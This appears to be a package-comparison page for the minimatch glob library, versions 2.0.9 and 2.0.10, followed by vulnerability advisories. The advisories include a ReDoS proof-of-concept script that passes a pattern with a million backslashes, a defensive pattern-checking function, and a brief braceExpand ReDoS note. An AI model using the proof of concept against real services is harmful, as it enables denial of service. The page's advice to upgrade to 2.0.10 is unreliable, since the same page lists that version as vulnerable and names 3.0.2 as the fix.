Minimatch is a popular JavaScript library used for glob matching, a technique for specifying sets of filenames with wildcard characters. Versions 2.0.9 and 2.0.10 of the library share the same core functionality, providing robust glob pattern matching for file system operations, data processing, and other tasks where flexible file selection is needed. Both versions depend on the brace-expansion package for handling brace expansion syntax within glob patterns, and they share the same development dependencies like tap for testing, standard for code style enforcement, and browserify for browser compatibility. They are both released under the ISC license and authored by Isaac Z. Schlueter.
The key difference lies in the release date. Version 2.0.10 was released on July 23, 2015, several days after version 2.0.9, which was released on July 18, 2015. This suggests that version 2.0.10 likely contains bug fixes, performance improvements, or minor updates implemented after the previous version. While the nature of these changes isn't explicit in the provided data, upgrading from 2.0.9 to 2.0.10 is generally recommended so that developers benefit from these improvements and use the most stable and up-to-date version of the library.
For developers using Minimatch, note that the library consistently provides efficient and flexible glob matching capabilities. The library uses the same repository URL for both versions.
All the vulnerabilities related to version 2.0.10 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
```javascript
var minimatch = require("minimatch");

// utility function for generating long strings
// (builds len + 1 copies of chr, as in the original loop bound)
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};

// pattern shape that triggers the pathological regular expression:
// a negated character class opened with "[!" followed by a very long run of backslashes
var exploit = "[!" + genstr(1000000, "\\") + "A";

// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
```
Update to version 3.0.2 or later.
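As an added defender-side example (not the advisory's or the minimatch project's own code): a pre-check for untrusted pattern strings before they reach minimatch(path, pattern), together with a version comparison against the 3.0.2 fix threshold named above. The limits, function names and sample inputs are assumptions constructed for this illustration.

```javascript
// Added example: reject pattern strings that an application should not hand to
// minimatch from untrusted input. Limits are illustrative assumptions.
const DEFAULT_LIMITS = { maxLength: 256, maxEscapeRun: 8 };

// Length of the longest run of consecutive backslashes in the pattern.
function longestEscapeRun(pattern) {
  let longest = 0, current = 0;
  for (const ch of pattern) {
    current = ch === '\\' ? current + 1 : 0;
    if (current > longest) longest = current;
  }
  return longest;
}

// Validates an untrusted pattern; returns { ok: true } or { ok: false, reason }.
function checkUntrustedPattern(pattern, limits = DEFAULT_LIMITS) {
  if (typeof pattern !== 'string') {
    return { ok: false, reason: 'pattern must be a string' };
  }
  if (pattern.length > limits.maxLength) {
    return { ok: false, reason: `pattern longer than ${limits.maxLength} characters` };
  }
  const run = longestEscapeRun(pattern);
  if (run > limits.maxEscapeRun) {
    return { ok: false, reason: `${run} consecutive backslashes exceeds ${limits.maxEscapeRun}` };
  }
  return { ok: true };
}

// Dotted numeric version comparison: true when installed >= required.
// Pre-release tags are not handled; enough for the 3.0.2 threshold in the advisory.
function isAtLeast(installed, required) {
  const a = installed.split('.').map(Number);
  const b = required.split('.').map(Number);
  for (let i = 0; i < Math.max(a.length, b.length); i++) {
    const x = a[i] || 0, y = b[i] || 0;
    if (x !== y) return x > y;
  }
  return true;
}

// Constructed samples: a normal glob and a small-scale copy of the advisory's
// pattern shape ("[!" + backslash run + "A"), plus the two versions on this page.
function demo() {
  const hostile = '[!' + '\\'.repeat(40) + 'A';
  return {
    benign: checkUntrustedPattern('src/**/*.js'),
    hostile: checkUntrustedPattern(hostile),
    fixedVersionOk: isAtLeast('3.0.2', '3.0.2'),
    pageVersionOk: isAtLeast('2.0.10', '3.0.2'),
  };
}
```

The check runs before any call into minimatch, so it costs linear time in the pattern length regardless of the library version; upgrading remains the actual fix.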
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.